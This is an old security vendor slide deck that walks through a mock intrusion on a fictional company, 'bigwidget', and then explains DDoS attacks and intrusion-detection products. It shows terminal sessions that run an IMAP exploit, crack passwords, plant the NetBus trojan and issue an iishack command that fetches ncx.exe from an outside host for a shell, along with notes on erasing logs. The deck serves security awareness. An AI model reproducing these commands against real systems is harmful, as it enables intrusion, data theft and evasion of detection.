Post on 30-Dec-2015
The Anatomy of a Web Attack
John RezabekTechnical Product Manager
jrezabek@iss.net
Agenda
• Methods of Attacks
• The Research
• The Break In
• Re-designing Web Sites
• DDOS – The New Threat
• Minimizing Threat Management
• Q & A
Methods of Attack
• Denial of Service– syn flood, ping of death, teardrop, etc
• Unauthorized Access– BackOrifice, Netbus, DNS Overflow, Crack
• Pre-attack Probes– Port Scan, SATAN
• Suspicious Activity– IP Unknown Protocol
• Protocol Decodes– NetBIOS Session Request, IRC
The Research ….
bigwidget.com
Record last updated on 29-Jun-98. Record created on 30-Jun-94. Database last updated on 13-Oct-98 06:21:01 EDT.
Domain servers in listed order: EHECATL. BIGWIDGET 208.21.0.7 NS1.SPRINTLINK.NET 204.117.214.10 NS.COMMANDCORP.COM 130.205.70.10
Registrant: BigWidget, Conglomerated. (BWC2-DOM) 1234 Main Street Anytown, GA USA
Domain Name: bigwidget.com Administrative Contact, Technical Contact, Zone Contact: BigWidget Admin (IA338-ORG) bwc-dnsadmin@bigwidget.com Phone- 678-555-1212 Fax- 678-555-1211
Billing Contact: BigWidget Billing (IB158-ORG) BigWidget-billing@bigwidget.com Phone- 678-555-1212 Fax- 678-555-1211
BIGWIDGET.COM
The Break in ….
~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
hacker:
hacker:~$
Connection closed by foreign host.
telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)(Report problems in this server to MRC@CAC.Washington.EDU)
. logout
* BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed
Connection closed by foreign host.
imap
imapd
hacker ~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.Author: Akylonius (aky@galeb.etf.bg.ac.yu)Modifications: p1 (p1@el8.org)
Completed successfully.
hacker ~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)Kernel 2.0.35 on an i686
root
bigwidget:~# whoami
root
bigwidget:~# cat ./hosts
127.0.0.1 localhost localhost.localdomain208.21.2.10 thevault accounting208.21.2.11 fasttalk sales208.21.2.12 geekspeak engineering208.21.2.13 people human resources208.21.2.14 thelinks marketing208.21.2.15 thesource web server
bigwidget:~# cd /etc
bigwidget:~# rlogin thevault
login:
Allan B. Smith 6543-2223-1209-4002 12/99Donna D. Smith 6543-4133-0632-4572 06/00Jim Smith 6543-2344-1523-5522 01/01Joseph L.Smith 6543-2356-1882-7532 04/02Kay L. Smith 6543-2398-1972-4532 06/03Mary Ann Smith 6543-8933-1332-4222 05/01Robert F. Smith 6543-0133-5232-3332 05/00
thevault:~#
cat visa.txt
cd /data/creditcards
thevault:~#
thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambobusername: mary password: maryusername: root password: ncc1701
thevault:~#ftp thesource
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.150 Opening BINARY mode data connection for netbus.exe226 Transfer complete.
ftp>
ftp>
quit
thevault:~$ telnet thesource
Trying 208.21.2.160... Connected to thesource.bigwidget.com.Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet ServiceTelnet Server Build 5.00.98217.1login: administrator
password: *******
*===============================================================Welcome to Microsoft Telnet Server.*===============================================================C:\> cd \temp
C:\TEMP> netbus.exe
NetBus
Connected to the.source.bigwidget.com
NetBus 1.6, by cf
Screendump
David Smith < dsmith@bigwidget.com >
President@bigwidget.com
My Raise < URGENT >
Dear Mr. Smith
I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.
Your Son,
Dave
David Smith
Anatomy of the AttackBigWidget’s Network
UNIXFirewall
E-Mail Server
Web Server
Router
NT
Clients & Workstations
Network
UNIX NTUNIX
imapimap
CrackCrack NetBusNetBus
Re-designing Web Sites“Using a simple exploit”
~$ iishack www.bigwidget.com 80 www.hackbox.sk/ncx.exe
Data sent !
hacker:
hacker:~$ telnet bigwidget.com 80
Trying 10.0.0.28...
Connected to bigwidget.com.
Microsoft (R) Windows NT (TM)(C) Copyright 1985-1996 Microsoft Corp.
C:\>[You have full access to the system, happy browsing :)]C:\>[Add a scheduled task to restart inetinfo in X minutes]C:\>[Add a schduled task to delete ncx.exe in X-1 minutes]C:\>[Clean up any trace or logs we might have left behind]C:\>exit
C:\>
Re-designing Web Sites“Using a free Sniffer”
c:\> ftp webcentral
Connected to webcentral220 webcentral Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: *******
230 User jsmith logged in.
Remote system type is Windows_NT.
ftp> send index.html
local: bigwedgie.html remote: index.html
200 PORT command successful.
150 Opening BINARY mode data connection for index.html
226 Transfer complete.
ftp>
ftp>
quit
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07 .
-rwxr-xr-x 9 root root 1024 Aug 17 17:07 ..
-rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif
-rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif
-rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg
-rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)
ftp> dir
Real World Website Defacements
New York Times
Distributed Denial of Service
“The New Threat”
What is a DDoS Attack ?
• In a Denial of Service (DoS) attack,– The attacker overwhelms a targeted system
with a flood of packets to deny availability of services to legitimate users
• In a Distributed Denial of Service (DDoS) attack,– The attacker uses dozens or even hundreds of
‘zombie’ machines to multiply the force of the attack
Motives Behind DDoS Attacks• Recent attacks appear to be motivated by:
– Desire for attention – Notoriety – Fun
• Long term, DDoS type attacks could become motivated by:– Economic warfare between competition– Disgruntled employees / customers – Monetary gains (i.e. stock manipulation)– Political sabotage and vandalism
Types of DDoS Attacks
• TFN (Tribal Flood Network)• Trin00• TFN2K (Tribal Flood Network 2K)• Stacheldraht (Barbed Wire)• NEW attack tools - Announced 2/15/00
– Fapi– Shaft– Trank
DDoS Components
• All DDoS attacks consist of three parts:– Client Program– Master Server– Agent (Zombie) Program
DDoS Attack Illustrated
ScanningProgram
Unsecured Computers
Hacker Hacker scans Internet for unsecured systems that can be compromised
1
Internet
Hacker
Zombies
Hacker secretly installs zombie agent programs, turning unsecured computers into zombies
2
Internet
DDoS Attack Illustrated
Hacker
Hacker selects a Master Server to send commands to the zombies
3
ZombiesMasterServer
Internet
DDoS Attack Illustrated
Hacker
Using Client program, Hacker sends commands to Master Server to launch zombie attack against a targeted system
4
Zombies
TargetedSystem
MasterServer
Internet
DDoS Attack Illustrated
Targeted SystemSystem
Hacker
Master Server sends signal to zombies to launch attack on targeted system
5
MasterServer
Internet
Zombies
DDoS Attack Illustrated
TargetedSystem
Hacker
Targeted system is overwhelmed by bogus requests that shut it down for legitimate users
6
MasterServer
User
Request Denied
Internet
Zombies
DDoS Attack Illustrated
Enterprise Risk Management
Enterprise Risk Management
Enterprise Security Management
Enterprise Security Management
Operating Systems ApplicationsDatabasesNetworks
Policy ViolationsVulnerabilitiesThreats
AlarmsCorrective actionActive responseActionable Information
Vulnerability Managementcorrective action reportcorrective action report
Vulnerability:
Severity:
IP Address:
OS:
Fix:
GetAdmin
High Risk
215.011.200.255
Windows NT 4.0From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, Apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.
Vulnerability Management
• Continued compliance to policy
• Unauthorized system changes
• New vulnerabilities
• Suspicious activity
• General ‘good practice’
Threat Management
EMAILALERT/
LOG
ATTACKDETECTED
RECORDSESSION
SESSIONTERMINATED
RECONFIGUREFIREWALL/
ROUTER
INTERNAL
ATTACKDETECTED
SESSIONLOGGED
Threat Management
• Known network attacks
• Continued compliance to policy
• Unauthorized access
• Suspicious network activity
• General ‘good practice’
Vulnerability Data
Threat Data
Firewall/Router Logs
PKI/Authentication DataInternal Threats
Vulnerabilities
External Threats
Time
Enterprise Security Risk Profile
Information Risk Management
Business Is Changing
Source: Forrester Research, Inc.
Access is granted to employees only
Applications and data are centralized in fortified IT bunkers
Security manager decides who gets access
Internal Focus
Centralized Assets
The goal of security is to protect against confidentiality
breaches
Prevent Losses
IT Control
Yesterday
Suppliers, customers, and prospects all need some
form of access
Applications and data are distributed across servers,
locations, and business units
The goal of security is to enable eCommerce
Business units want the authority to grant access
External Focus
Distributed Assets
Generate Revenue
Business Control
Today
Minimizing Risk
• Prevent yourself from being victimized
– Ensure your computers are not zombies– Perform periodic assessments via automated
scanning services
• Implement an early warning system
– Automated Intrusion Detection & Response tools– Collect forensic data to prosecute hackers later
Additional Resources
• Secure e-Business White Paper: http://solutions.iss.net/products/whitepapers/securityebus.pdf
• What to do if you are attacked: http://www.iss.net/news/denial.php
• Technical information about DDoS attacks: http://xforce.iss.net/alerts/advise43.php3
• X-Force Security Risk Database:http://xforce.iss.net
• ISS Download Center: http://www.iss.net/eval/eval.php
• ISS White Papers: http://solutions.iss.net/products/whitepapers
Questions & Answers ?
Thank you for your time, for more information see www.iss.net
Thank You